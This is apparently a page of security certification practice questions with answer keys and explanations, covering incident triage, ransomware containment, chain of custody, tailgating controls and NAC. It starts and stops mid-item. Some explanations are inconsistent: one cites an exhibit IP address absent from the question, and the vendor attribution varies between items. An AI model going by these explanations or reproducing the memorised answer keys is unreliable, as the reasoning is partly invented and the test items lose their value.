Option A is wrong because simply placing a reverse proxy does not fix the underlying TLS configuration on the origin server; the finding should not be closed as 'fixed' since the vulnerability still exists on the server itself. Option C is wrong because the TLS configuration issue is a real vulnerability, not a false positive, and removing it from scans would bypass proper risk tracking and violate vulnerability management best practices.

99
MCQeasy

A SOC analyst sees 38 failed logins for a finance user account from one public IP address over 4 minutes, followed by one successful login. What should the analyst do first?

A.Immediately delete the account to stop any further access attempts.
B.Correlate the authentication logs with user activity and VPN records to verify whether the login pattern is expected.
C.Assume the account is compromised and notify all users to change their passwords.
D.Close the alert because one successful login means the activity was normal.
AnswerB

Correlating related logs is the best first step because it helps determine whether the event is a real attack or an expected user behavior pattern. Authentication logs, VPN records, and account activity can show whether the source IP, timing, and device match a legitimate session. Good triage focuses on confirmation before disruptive response actions.

Why this answer

Option B is correct because the analyst must first verify whether the failed logins followed by a successful login represent a brute-force attack or legitimate behavior, such as a user mistyping their password and then succeeding. Correlating authentication logs with user activity and VPN records helps confirm if the public IP belongs to a known remote user or VPN endpoint, which is a standard first step in incident response to avoid false positives.

Exam trap

The trap here is that candidates assume a successful login after many failures always indicates compromise, but the question tests the critical first step of verification through log correlation before taking any action.

How to eliminate wrong answers

Option A is wrong because immediately deleting the account disrupts business operations and destroys forensic evidence; account deletion should only occur after thorough investigation and confirmation of compromise. Option C is wrong because assuming compromise without verification leads to unnecessary panic and password fatigue; the analyst must first correlate logs to determine if the activity is expected before initiating a password reset. Option D is wrong because one successful login after many failures does not indicate normal activity—it could indicate a successful brute-force attack, and closing the alert without investigation violates security operations procedures.

100
Multi-Selecthard

A SIEM analyst reviews the following sequence from a VPN and email platform over 15 minutes: 47 failed logins against different accounts from one public IP, one successful VPN login from that same IP, a new inbox forwarding rule to an external address, and a mailbox sign-in from a device never seen before. Which three findings most strongly support a password-spraying-to-compromise scenario? Select three.

Select 3 answers
A.Many failed logins across different usernames from the same source IP in a short time window.
B.A successful VPN login from the same source IP after the burst of failures.
C.An inbox forwarding rule sending messages to an external address.
D.A workstation patch installation completed earlier that day.
E.The mailbox server reported normal disk utilization during the same hour.
AnswersA, B, C

That pattern strongly matches password spraying because one attacker tries a small number of guesses across many accounts.

Why this answer

Option A is correct because a high volume of failed logins against multiple accounts from a single public IP within a short time window is the hallmark of a password-spraying attack, where the attacker tries a few common passwords across many usernames to avoid account lockout. This pattern is distinct from a brute-force attack, which targets a single account with many passwords.

Exam trap

The trap here is that candidates may think a single successful login or a forwarding rule alone is suspicious, but the question asks for findings that most strongly support the password-spraying-to-compromise scenario, which requires the combination of the spray pattern, the successful login from the same source, and the post-compromise persistence action.

101
Multi-Selecthard

After a ransomware incident, management says backups are available but will not approve closure until the team proves the restore process works without risking production data. Which two actions best validate recoverability? Select two.

Select 2 answers
A.Restore a recent backup to an isolated test system that mirrors production.
B.Verify file integrity and application functionality after the restore completes.
C.Increase backup retention without testing the restore process.
D.Keep the original ransomware-affected server online until the backup is approved.
E.Use the backup job report as proof that the data can be recovered.
AnswersA, B

A test restore proves the backup can be read and expanded into a usable system without impacting live production.

Why this answer

Restoring to an isolated test system that mirrors production (Option A) is correct because it validates the backup's integrity and the restore process without any risk to the live production environment. This approach ensures the backup data is readable and the restoration steps are documented and repeatable, directly addressing management's requirement to prove recoverability without endangering production data.

Exam trap

CompTIA often tests the misconception that a backup job report or increased retention alone proves recoverability, when in fact only a successful restore to a test environment with validation steps can confirm that the data is usable and the process works.

102
MCQmedium

A security analyst in the SOC observes a sudden spike in failed authentication attempts from a single external IP address targeting multiple user accounts over the last 30 minutes. After confirming the logs are accurate, which of the following actions should the analyst take FIRST according to standard incident response procedures?

A.Block the IP address at the firewall immediately.
B.Disable all user accounts that were targeted.
C.Escalate the incident to the incident response team.
D.Capture a memory dump of all affected servers.
AnswerC

Escalation is the first step after detection. The incident response team will follow the organization's plan to analyze, contain, eradicate, and recover from the incident. This ensures a coordinated and controlled response.

Why this answer

Option C is correct because, according to standard incident response procedures (NIST SP 800-61), the first step after confirming an anomaly is to escalate the incident to the incident response team. This ensures that a coordinated, documented, and legally defensible response is initiated, rather than taking unilateral action that could destroy evidence or disrupt legitimate services. The SOC analyst's role is to detect and validate, not to independently execute containment measures without authorization.

Exam trap

The trap here is that candidates often confuse 'immediate containment' with 'first action,' forgetting that escalation and validation must precede any technical countermeasure to ensure proper evidence preservation and coordinated response.

How to eliminate wrong answers

Option A is wrong because immediately blocking the IP address at the firewall could be an overreaction—the IP might be a legitimate proxy or VPN used by multiple users, and blocking it could disrupt business operations and destroy forensic evidence of the attack chain. Option B is wrong because disabling all targeted user accounts without investigation could lock out legitimate users who were not compromised, and it does not address the root cause (the external attacker), potentially allowing the attacker to pivot to other accounts or methods.

103
MCQmedium

A security analyst notices repeated attempts to copy large amounts of data to USB drives from a user's workstation. The analyst suspects the user may be exfiltrating company proprietary data. The company wants to implement a technical control that can both detect and block such data exfiltration without completely disabling all USB ports, as some users require USB for authorized work. Which of the following would best meet this requirement?

A.Implement a host-based intrusion detection system (HIDS) that alerts on USB insertion events.
B.Deploy a data loss prevention (DLP) agent configured with rules to monitor and block unauthorized data transfers to removable media.
C.Enable BitLocker encryption on all USB drives to prevent unauthorized data access.
D.Configure the local group policy to disable all USB ports on all workstations.
AnswerB

A DLP agent can inspect data in real time, apply policies to classify sensitive content, and block transfers that violate company rules. This meets the need to both detect and block exfiltration while still permitting authorized USB use.

Why this answer

Option B is correct because a Data Loss Prevention (DLP) agent can be configured with granular rules to monitor and block unauthorized data transfers to removable media (e.g., USB drives) based on content inspection, file type, or volume thresholds. This allows authorized USB usage while preventing exfiltration of proprietary data, meeting the requirement for both detection and blocking without disabling all USB ports.

Exam trap

The trap here is that candidates often confuse detection-only controls (like HIDS alerts) with prevention controls, or they assume encryption (BitLocker) can stop data exfiltration, when in fact encryption only protects data at rest and does not prevent copying from the host.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion detection system (HIDS) can only alert on USB insertion events but cannot block data transfers, so it fails to meet the requirement for blocking exfiltration. Option C is wrong because BitLocker encryption protects data at rest on USB drives from unauthorized access if the drive is lost, but it does not monitor or block the act of copying data to the drive from the workstation. Option D is wrong because disabling all USB ports via group policy would block all USB usage, including authorized work, which directly contradicts the requirement to allow some users to use USB for legitimate purposes.

104
MCQmedium

A data center has repeated tailgating incidents at the entry to the server room. Management wants a control that forces one person to pass after badge authentication and prevents two people from entering together. What should be installed?

A.A mantrap between the outer door and the server room entrance
B.A CCTV camera focused on the doorway
C.A motion sensor inside the server room
D.A standard badge reader with no additional controls
AnswerA

A mantrap is designed to prevent tailgating by allowing only one person to pass through at a time after authentication. It is the best control for physically enforcing single-person entry.

Why this answer

A mantrap is a physical security control with two interlocking doors that enforces one-person entry. After badge authentication at the outer door, the inner door will not unlock until the outer door closes and locks, preventing two people from entering together. This directly addresses tailgating by creating a small vestibule that can only hold one authenticated person at a time.

Exam trap

Cisco often tests the distinction between passive monitoring (CCTV) and active prevention (mantrap), leading candidates to mistakenly choose CCTV because they think recording alone will deter tailgating.

How to eliminate wrong answers

Option B is wrong because a CCTV camera only provides passive monitoring and does not physically prevent two people from entering together; it records incidents but does not enforce access control. Option C is wrong because a motion sensor inside the server room detects movement after entry but cannot stop tailgating at the door; it might even trigger false alarms from authorized occupants. Option D is wrong because a standard badge reader with no additional controls allows anyone to follow an authenticated user through the door without any physical barrier or detection mechanism to prevent tailgating.

105
MCQeasy

A SOC analyst wants to make sure logs from multiple servers can be compared accurately during an incident review. What should be configured on those systems?

A.A local administrator account with the same password on every server
B.Time synchronization using the same trusted time source
C.A larger disk size on the log server
D.A separate VLAN for each application server
AnswerB

Consistent timestamps are essential for correlating events from different systems during investigation.

Why this answer

Time synchronization using a trusted time source (e.g., NTP) ensures that all servers share the same clock. During incident review, accurate log correlation depends on timestamps being consistent across systems; even a few seconds of drift can misalign event sequences. Without synchronized time, comparing logs from multiple servers becomes unreliable, potentially obscuring the true timeline of an attack.

Exam trap

The trap here is that candidates may confuse administrative convenience (same password) or storage capacity with the fundamental need for temporal consistency, overlooking that log correlation depends on synchronized clocks, not identical credentials or disk space.

How to eliminate wrong answers

Option A is wrong because using a local administrator account with the same password on every server violates the principle of least privilege and creates a massive security risk—if one server is compromised, all servers are exposed. It does nothing to ensure log timestamps are consistent. Option C is wrong because increasing disk size on the log server only addresses storage capacity, not the accuracy of timestamp comparisons across servers; logs can still have misaligned times even if storage is abundant.

106
MCQmedium

A security analyst detects real-time data exfiltration from a critical production database that supports customer transactions. The exfiltration appears to be occurring via a compromised application service account. Which containment strategy should the analyst implement FIRST to minimize damage while preserving forensic data?

A.Disconnect the database server from the network.
B.Shut down the database server.
C.Implement network segmentation to isolate the server.
D.Block the IP address of the suspected attacker.
AnswerA

Correct. Disconnecting the server immediately stops the data flow to the attacker, preserving the database state and forensic data without crashing the server.

Why this answer

Disconnecting the database server from the network (Option A) immediately stops the active data exfiltration by severing all network communication, including the compromised service account's outbound connections. This preserves the server's volatile memory, running processes, and disk state for forensic analysis, unlike a shutdown which would destroy critical evidence. It is the fastest containment action that minimizes data loss while maintaining the integrity of forensic artifacts.

Exam trap

Cisco often tests the misconception that shutting down a server is the safest containment action, but the trap here is that shutdown destroys volatile forensic data (e.g., active network connections, memory-resident malware) that is critical for attribution and root cause analysis.

How to eliminate wrong answers

Option B is wrong because shutting down the database server would terminate all processes, clear volatile memory (RAM), and potentially destroy evidence of the exfiltration (e.g., active network connections, malicious processes, or in-memory payloads), making forensic analysis impossible. Option C is wrong because implementing network segmentation takes time to configure and deploy, during which the exfiltration continues; it is a longer-term containment measure, not a first-response action to stop an active breach.

107
MCQmedium

A server room uses raised flooring and sits below a chilled-water pipe. Facilities wants the earliest warning if water starts accumulating under the floor tiles. Which control should be added?

A.Add more motion detectors near the racks.
B.Use badge readers on the server room door.
C.Install smoke detectors only.
D.Install leak-detection sensors or a moisture detection cable tied to alerts.
AnswerD

Leak-detection sensors placed under the floor can detect water as soon as it appears, which is exactly what facilities wants here. Early warning lets staff respond before equipment is damaged or a larger outage occurs. For a room below a chilled-water pipe, environmental monitoring is more effective than access control or motion detection because the hazard is liquid intrusion rather than unauthorized entry.

Why this answer

Option D is correct because leak-detection sensors or moisture-detection cables are specifically designed to detect water accumulation under raised floors, providing the earliest possible warning. These sensors trigger alerts when moisture is present, allowing facilities to respond before water damages equipment or causes downtime. This directly addresses the risk of a chilled-water pipe leak in a server room environment.

Exam trap

The trap here is that candidates may confuse environmental monitoring controls (like leak detection) with physical security controls (like motion detectors or badge readers), or assume smoke detectors are sufficient for all hazard detection, when they are specific to fire only.

How to eliminate wrong answers

Option A is wrong because motion detectors detect movement (e.g., people or objects) and cannot sense water or moisture, so they provide no warning of a water leak. Option B is wrong because badge readers control physical access to the server room but do not detect environmental hazards like water accumulation. Option C is wrong because smoke detectors are designed to detect smoke or fire, not water; they would not activate until a fire occurs, missing the water leak entirely.

108
Multi-Selecteasy

After collecting a suspect laptop, the responder makes a bit-for-bit image of the drive. Which two actions best support chain of custody? Select two.

Select 2 answers
A.Calculate and record a cryptographic hash of the image.
B.Document every evidence transfer with date, time, and handler names.
C.Browse the original drive on a normal office laptop.
D.Rename files to make them easier for later review.
E.Store the image on a shared folder without access controls.
AnswersA, B

A hash provides a repeatable way to show the image changed or stayed the same.

Why this answer

Option A is correct because calculating and recording a cryptographic hash (e.g., SHA-256) of the bit-for-bit image creates a digital fingerprint that can later be used to verify the image has not been altered. This ensures data integrity, a core requirement for maintaining chain of custody in digital forensics.

Exam trap

The trap here is that candidates may think browsing the original drive is acceptable if done carefully, but any direct access to the original evidence modifies it and breaks the forensic integrity chain.

109
Multi-Selecthard

An analyst receives a disk image and the original hash from a response team member. Before any examination begins, the analyst must be able to show the image is unchanged and that the evidence handling process is defensible. Which two actions are most important? Select two.

Select 2 answers
A.Recompute the SHA-256 hash of the received image and compare it to the acquisition record.
B.Mount the original disk read/write so the file system can repair itself before analysis.
C.Record the transfer, date, time, and handler names in the chain-of-custody log.
D.Convert the image to another format before hashing so the tool can open it.
E.Rename evidence files to match the case number and avoid confusion.
AnswersA, C

Hash verification proves the image bytes match what was originally collected and have not changed in transit.

Why this answer

Recomputing the SHA-256 hash of the received image and comparing it to the original acquisition record is essential to verify data integrity. SHA-256 is a cryptographic hash function that produces a unique fixed-size output; if even one bit of the image changes, the hash will differ. This comparison proves the image has not been altered during transit or storage, which is a foundational requirement for maintaining forensic soundness.

Exam trap

The trap here is that candidates may think mounting the image read/write (Option B) is acceptable for file system repair, but any write operation violates forensic integrity principles and invalidates the hash comparison.

110
Drag & Dropmedium

Drag and drop the steps to implement a backup strategy following the 3-2-1 rule into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

The 3-2-1 rule ensures redundancy: three copies, two different media, one offsite. Testing is crucial to verify recoverability.

111
MCQmedium

A help desk technician receives an alert that an unmanaged laptop was plugged into a conference room network jack and was automatically placed into a restricted network segment until it passed a security check. Which control is responsible for that behavior?

A.Network access control (NAC).
B.Data loss prevention (DLP).
C.Intrusion prevention system (IPS).
D.Sandboxing gateway.
AnswerA

NAC can authenticate devices, check posture, and place noncompliant systems into a limited or quarantine network segment.

Why this answer

Network Access Control (NAC) is the correct answer because it is specifically designed to enforce security policies on devices attempting to connect to a network. When an unmanaged laptop is plugged into a network jack, NAC evaluates the device's compliance (e.g., antivirus status, patch level) and, if it fails, automatically places it into a restricted segment (e.g., a quarantine VLAN) until it passes a security check. This behavior is a core function of NAC solutions like Cisco ISE or Aruba ClearPass, which use 802.1X or MAC authentication bypass to dynamically assign VLANs based on device posture.

Exam trap

The trap here is that candidates often confuse NAC with an IPS or firewall because both can block traffic, but NAC specifically controls access at the point of network entry (Layer 2) based on device identity and compliance, not by inspecting packet payloads.

How to eliminate wrong answers

Option B is wrong because Data Loss Prevention (DLP) focuses on monitoring and preventing unauthorized transmission of sensitive data, not on controlling network access or quarantining devices. Option C is wrong because an Intrusion Prevention System (IPS) inspects network traffic for malicious patterns and blocks attacks, but it does not enforce pre-admission security checks or dynamically segment devices based on compliance. Option D is wrong because a sandboxing gateway detonates suspicious files in an isolated environment to analyze behavior, but it does not manage network access or quarantine endpoints at the switch port level.

112
Multi-Selecthard

A records room has repeated tailgating after hours and occasional door propping during deliveries. Management wants one control that prevents follow-on entry and another that immediately alerts security if the door is forced open or left ajar. Which two controls best meet the need? Select two.

Select 2 answers
A.Install a mantrap at the room entrance.
B.Add a door position sensor tied to an alarm or SIEM alert.
C.Place a larger warning sign on the wall beside the door.
D.Mount a visible camera over the door only.
E.Replace the mechanical lock with the same type of lock and no monitoring.
AnswersA, B

A mantrap allows only one person or credentialed entry at a time, which directly reduces tailgating.

Why this answer

A mantrap (option A) prevents tailgating by requiring one door to close before the next can open, effectively stopping follow-on entry. A door position sensor (option B) detects when the door is forced open or left ajar and triggers an immediate alert to security via an alarm or SIEM integration, meeting the requirement for real-time notification.

Exam trap

The trap here is that candidates often choose a camera (option D) thinking it provides real-time alerting, but a standard visible camera without integrated analytics does not automatically alert on door status—it only records footage for later review.

113
MCQeasy

A critical patch must be applied to a production server next week. What is the best way to reduce the risk of downtime if the patch causes a problem?

A.Apply the patch during business hours so users can report issues quickly
B.Create a rollback plan before installing the patch
C.Skip testing because critical patches are always safe
D.Disable logging during the patch to improve performance
AnswerB

A rollback plan allows the team to return to a known good state if the patch fails.

Why this answer

Option B is correct because creating a rollback plan before installing a patch ensures that if the patch causes unexpected issues, the system can be restored to its previous stable state quickly, minimizing downtime. A rollback plan typically includes steps to revert the patch, restore from a backup, or switch to a failover system, which is a fundamental change management practice in security operations.

Exam trap

The trap here is that candidates may assume applying a patch during business hours allows for quick user feedback, but this overlooks the higher risk of widespread disruption and the importance of a controlled maintenance window.

How to eliminate wrong answers

Option A is wrong because applying a patch during business hours increases the risk of disrupting users and operations; patches should be applied during maintenance windows to minimize impact. Option C is wrong because skipping testing is dangerous even for critical patches, as they can still introduce compatibility issues or break existing functionality; testing in a non-production environment is essential. Option D is wrong because disabling logging during a patch removes the ability to audit changes and troubleshoot problems, which could lead to undetected issues and longer downtime.

114
Multi-Selecteasy

A data center wants to reduce tailgating at a sensitive room entrance. Which two controls are most effective? Select two.

Select 2 answers
A.A mantrap that allows only one person through at a time.
B.A turnstile or other one-person entry control.
C.A standard badge reader without anti-passback.
D.A motion sensor in the hallway.
E.A visitor sign-in sheet at the front desk.
AnswersA, B

A mantrap forces one person through at a time and blocks piggybacking.

Why this answer

A mantrap is a small room with two interlocking doors that allows only one person to enter at a time, physically preventing tailgating by trapping unauthorized individuals between the doors. This control enforces strict one-person entry and is highly effective against tailgating in high-security areas.

Exam trap

The trap here is that candidates may confuse administrative controls like sign-in sheets or detection controls like motion sensors with physical deterrents, failing to recognize that only physical barriers like mantraps and turnstiles actively prevent tailgating.

115
MCQeasy

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

A.Deploy the updates immediately to all desktops at once
B.Schedule the updates during an approved maintenance window
C.Ask each user to install updates whenever they have time
D.Disable update notifications permanently
AnswerB

A maintenance window reduces user impact and gives the team predictable time to monitor the changes.

Why this answer

Scheduling updates during an approved maintenance window ensures that desktops are updated during a period of low activity, minimizing disruption to call center operations. This approach aligns with change management best practices, allowing for controlled deployment and rollback if issues arise, and avoids the performance degradation or reboots that could interrupt active calls.

Exam trap

The trap here is that candidates may choose immediate deployment (A) thinking it is the most efficient for security, overlooking the operational requirement to maintain service availability during peak hours.

How to eliminate wrong answers

Option A is wrong because deploying updates immediately to all desktops at once risks simultaneous reboots or performance slowdowns during peak hours, which would directly interrupt callers and violate availability requirements. Option C is wrong because asking each user to install updates whenever they have time lacks coordination and control; users may forget, delay, or apply updates inconsistently, leading to security gaps and unpredictable system behavior.

116
MCQeasy

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

A.The system authentication log
B.The printer spooler log
C.The browser history log
D.The backup completion log
AnswerA

This is the best choice because authentication logs record login attempts, failures, and success events. For SSH activity, the auth log or equivalent security log is the most direct place to confirm whether the attempts are real, what accounts were targeted, and whether any successful logon followed the failures. It provides the most useful first evidence for triage.

Why this answer

The system authentication log (e.g., /var/log/auth.log or /var/log/secure) records all SSH login attempts, including failed ones, along with source IP addresses. This is the primary log source for investigating authentication failures on Linux systems, as it captures PAM (Pluggable Authentication Module) events and SSH daemon messages.

Exam trap

The trap here is that candidates might confuse system authentication logs with generic system logs (e.g., /var/log/messages) or assume that SSH failures would be recorded in a network-level log, but the exam specifically tests knowledge of Linux authentication logging mechanisms.

How to eliminate wrong answers

Option B is wrong because the printer spooler log (e.g., /var/log/cups/) tracks print jobs and printer errors, not network authentication events like SSH logins. Option C is wrong because browser history logs are client-side records of web browsing activity, unrelated to server-side SSH authentication attempts. Option D is wrong because the backup completion log (e.g., /var/log/backup.log) records backup job statuses, not real-time authentication failures from remote IP addresses.

117
Multi-Selecthard

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Select 3 answers
A.Document the evidence identifier, collector, date, time, and location on the chain-of-custody form.
B.Calculate and record cryptographic hashes for the original evidence and the forensic image.
C.Place the original device in a sealed, access-controlled evidence locker after collection.
D.Mount the original drive read/write so investigators can search it faster.
E.Rename the image file to match the case number before hashing it.
AnswersA, B, C

Complete documentation shows who handled the evidence and when, which helps establish a defensible custody history.

Why this answer

Option A is correct because documenting the evidence identifier, collector, date, time, and location on the chain-of-custody form establishes a clear, auditable record of who handled the evidence and when. This documentation is essential for proving the evidence has not been tampered with and is admissible in court. Without this detailed logging, the chain of custody is broken, and the evidence may be challenged.

Exam trap

The trap here is that candidates may think renaming a file is harmless, but any alteration—including metadata changes—breaks the hash integrity required for evidence admissibility.

118
MCQmedium

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

A.The user's smart card and PIN were stolen, allowing an attacker to authenticate from Brazil.
B.An attacker performed a pass-the-hash attack using cached credentials from jsmith's workstation.
C.The VPN server's certificate was forged, allowing the attacker to intercept jsmith's credentials.
D.The user's account password was guessed through a brute-force attack and then used to create a new certificate.
AnswerA

Correct. Smart card authentication requires possession of the physical card and the PIN. If both are stolen, an attacker can impersonate the user.

Why this answer

Option A is correct because the scenario describes a successful VPN authentication using a valid smart card certificate from a location (Brazil) that the legitimate user (jsmith) denies accessing. Since the certificate was not revoked and the smart card requires both the card and PIN for use, the most plausible explanation is that both were stolen, enabling an attacker to authenticate as jsmith. The certificate revocation list (CRL) check confirms the certificate is still valid, ruling out revocation-based defenses, and the user's physical presence in Chicago eliminates the possibility of a legitimate remote session.

Exam trap

The trap here is that candidates may assume a valid certificate and successful authentication imply the user is legitimate, overlooking that physical theft of the smart card and PIN allows an attacker to authenticate as the user without any cryptographic anomaly.

How to eliminate wrong answers

Option B is wrong because a pass-the-hash attack exploits NTLM hash caching for authentication, but the VPN session used a smart card certificate (PKI-based authentication), not a password hash. Pass-the-hash is irrelevant to certificate-based authentication mechanisms. Option C is wrong because a forged VPN server certificate would enable a man-in-the-middle attack to intercept credentials, but it would not allow an attacker to authenticate as jsmith using his valid smart card certificate; the attacker would need jsmith's private key and PIN, which are not obtained by forging the server certificate.

119
MCQmedium

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

A.Remotely isolate the device through the EDR console while keeping it powered on.
B.Ask the user to uninstall the EDR agent and reboot the laptop.
C.Wait until after the presentation and then begin containment.
D.Email the user asking them to close the browser and log out of their accounts.
AnswerA

EDR isolation is the best containment action because it stops most network communication while preserving the device state for investigation. Keeping the endpoint powered on maintains access to volatile evidence and avoids unnecessary disruption to disk contents or running processes. This is especially useful when the user is remote, because it can contain the threat quickly without requiring physical access or a full shutdown that would erase useful forensic data.

Why this answer

Remotely isolating the device through the EDR console is the best containment action because it immediately blocks all network communication to and from the laptop while keeping it powered on and running. This prevents the suspicious process from exfiltrating browser credentials or communicating with the rare command-and-control domain, yet allows the user to continue using local applications for the presentation later today. EDR isolation typically works by applying a host-based firewall rule that drops all traffic except to the EDR management server, ensuring the threat is contained without disrupting local productivity.

Exam trap

The trap here is that candidates may choose to wait until after the presentation (Option C) due to business continuity concerns, failing to recognize that immediate containment via network isolation can preserve both security and productivity.

How to eliminate wrong answers

Option B is wrong because asking the user to uninstall the EDR agent removes the very tool needed to monitor and contain the threat, leaving the laptop defenseless and potentially allowing the malicious process to continue unchecked. Option C is wrong because waiting until after the presentation gives the attacker time to exfiltrate sensitive credentials and establish persistence, violating the fundamental incident response principle of immediate containment. Option D is wrong because emailing the user to close the browser and log out does not stop the suspicious process from running in the background or prevent it from communicating with the rare domain, and the user may not act promptly or correctly.

120
MCQmedium

Based on the exhibit, what is the most likely explanation for the alert?

A.The workstation has been redirected to an approved corporate proxy, so the event is expected.
B.A DNS cache poisoning attack is in progress and the workstation is now using a rogue gateway.
C.The endpoint is infected with malware that is hiding its traffic through encrypted tunnels.
D.The workstation is under a denial-of-service attack because it sent repeated DNS lookups.
AnswerA

The exhibit shows the workstation resolving WPAD, retrieving the proxy auto-configuration file, and then sending traffic to the approved proxy listed in inventory. Those steps match normal browser proxy discovery, not malicious behavior. Because the destination is the known corporate proxy, the alert should be validated as legitimate and then tuned if it repeatedly fires on the same approved sequence.

Why this answer

The alert indicates that the workstation's DNS traffic is being redirected to an internal proxy server (10.0.0.53), which is a common configuration in corporate environments for content filtering and security monitoring. Since the destination IP (10.0.0.53) is within the organization's private IP range and the proxy is explicitly approved, this behavior is expected and not malicious. The event is consistent with a transparent proxy or DNS-based proxy redirection, where the workstation's DNS queries are intercepted and forwarded to the corporate proxy.

Exam trap

The trap here is that candidates often assume any DNS redirection to an internal IP indicates a man-in-the-middle attack or DNS poisoning, but they overlook that corporate proxies legitimately use this technique for security monitoring and content filtering.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning would involve a rogue DNS server returning forged responses, not a consistent redirection to an internal proxy IP; the exhibit shows the workstation's DNS queries going to 10.0.0.53, which is a private IP, not a spoofed external address. Option C is wrong because malware using encrypted tunnels would typically show traffic to an external C2 server over protocols like HTTPS or DNS over HTTPS, not a consistent pattern of DNS queries to a known internal proxy IP. Option D is wrong because a denial-of-service attack would involve an overwhelming volume of traffic or resource exhaustion, not a single workstation sending DNS lookups to a proxy; repeated DNS lookups alone do not indicate a DoS attack.

121
MCQmedium

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

A.Immediately wipe the hard drives of all affected workstations and reinstall the operating system.
B.Isolate the affected workstations from the network by disconnecting their network cables and disabling Wi-Fi.
C.Contact local law enforcement to report the ransomware incident and request a forensic investigation.
D.Conduct a full forensic analysis of one affected workstation to determine the ransomware variant and entry vector.
AnswerB

This is the correct first step. Rapid containment (isolation) limits the scope of the incident and prevents the ransomware from encrypting additional systems or exfiltrating data.

Why this answer

The first priority in a suspected ransomware outbreak is containment to prevent lateral spread and further encryption. Disconnecting network cables and disabling Wi-Fi immediately isolates the affected workstations from the network, stopping the ransomware from communicating with its command-and-control (C2) server or encrypting additional systems. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

The trap here is that candidates often jump to eradication (wiping drives) or notification (calling law enforcement) first, forgetting that containment is the immediate priority to stop the outbreak from spreading across the network.

How to eliminate wrong answers

Option A is wrong because immediately wiping hard drives destroys forensic evidence and prevents analysis of the ransomware variant, infection vector, and scope of compromise, which is critical for understanding and preventing future incidents. Option C is wrong because contacting law enforcement is a notification step that occurs after containment and initial analysis; delaying containment to call authorities allows the ransomware to continue spreading and causing more damage.

122
Multi-Selecthard

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Select 2 answers
A.A current list of logged-in users and active sessions, because it shows who has access right now.
B.Live network connection information, because it shows current remote targets and suspicious channels.
C.The server’s warranty status, because hardware replacement may be needed later.
D.A fresh operating system patch, because updating quickly reduces all risk.
E.A user satisfaction survey, because affected staff can describe what they noticed.
AnswersA, B

Active session information is volatile and can disappear on reboot. It helps identify whether a legitimate user, compromised account, or attacker shell is currently present on the server. That makes it one of the highest-value items to capture first.

Why this answer

Option A is correct because capturing a current list of logged-in users and active sessions provides immediate visibility into which accounts are currently authenticated and potentially being used by an attacker for lateral movement. This data is volatile and would be lost upon reboot, making it critical to collect before any remediation. In this scenario, the successful SSH login from a new source IP suggests an attacker may have established a foothold, and knowing active sessions helps identify compromised accounts and ongoing access.

Exam trap

The trap here is that candidates may prioritize remediation actions like patching or hardware checks over preserving volatile forensic evidence, failing to recognize that live user sessions and network connections are the most time-sensitive data to collect before any system change.

123
MCQmedium

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

A.Factory reset the laptop so investigators can start from a clean system
B.Seal the device in an evidence bag and record each handoff with signatures
C.Remove the hard drive and image it without any documentation
D.Leave the laptop unlocked so the next analyst can inspect it quickly
AnswerB

Sealing and documented handoffs create a defensible custody record and reduce the chance of tampering.

Why this answer

Option B is correct because sealing the device in an evidence bag and recording each handoff with signatures establishes a documented, unbroken chain of custody. This ensures the integrity of the evidence by preventing tampering and providing a verifiable record of who handled the device and when, which is critical for admissibility in legal proceedings.

Exam trap

The trap here is that candidates may think a factory reset (Option A) helps investigators start clean, but it actually destroys evidence, while proper sealing and documentation (Option B) is the only method that preserves evidence integrity for legal proceedings.

How to eliminate wrong answers

Option A is wrong because factory resetting the laptop destroys all potential evidence, including files, logs, and metadata, making it impossible for investigators to recover data relevant to the theft. Option C is wrong because removing the hard drive and imaging it without documentation violates chain of custody principles, as there is no record of who performed the action or when, compromising evidence integrity. Option D is wrong because leaving the laptop unlocked risks unauthorized access, alteration, or deletion of evidence, breaking the chain of custody and potentially rendering the evidence inadmissible.

124
Multi-Selecteasy

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Select 2 answers
A.EDR remote isolation capability on the endpoint.
B.Sandboxing the attachment before release to users.
C.DLP monitoring to prevent accidental data leakage.
D.A WAF filtering web requests to the application.
E.Port mirroring on a switch for traffic review.
AnswersA, B

EDR can isolate the host while preserving its state for later investigation.

Why this answer

A is correct because EDR remote isolation capability allows the security team to immediately disconnect an endpoint from the network if the suspicious attachment is executed, preventing lateral movement and data exfiltration. B is correct because sandboxing the attachment before release to users provides a safe, isolated environment to analyze the file's behavior without risking the production network. Together, these tools address both proactive analysis (sandbox) and reactive containment (EDR isolation).

Exam trap

The trap here is that candidates may confuse DLP's data loss prevention role with threat analysis or endpoint containment, overlooking that DLP does not execute files or isolate systems.

125
MCQmedium

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

A.Disconnect the server from the network immediately.
B.Block the IP address at the perimeter firewall.
C.Review the server's process list and logs to identify the source.
D.Escalate the incident to the incident response team.
AnswerC

This is the correct first step. By examining the process list and logs (e.g., system, firewall, and application logs), the analyst can determine the specific process or service responsible for the outbound connection, assess whether it is malicious, and gather evidence for further investigation or escalation.

Why this answer

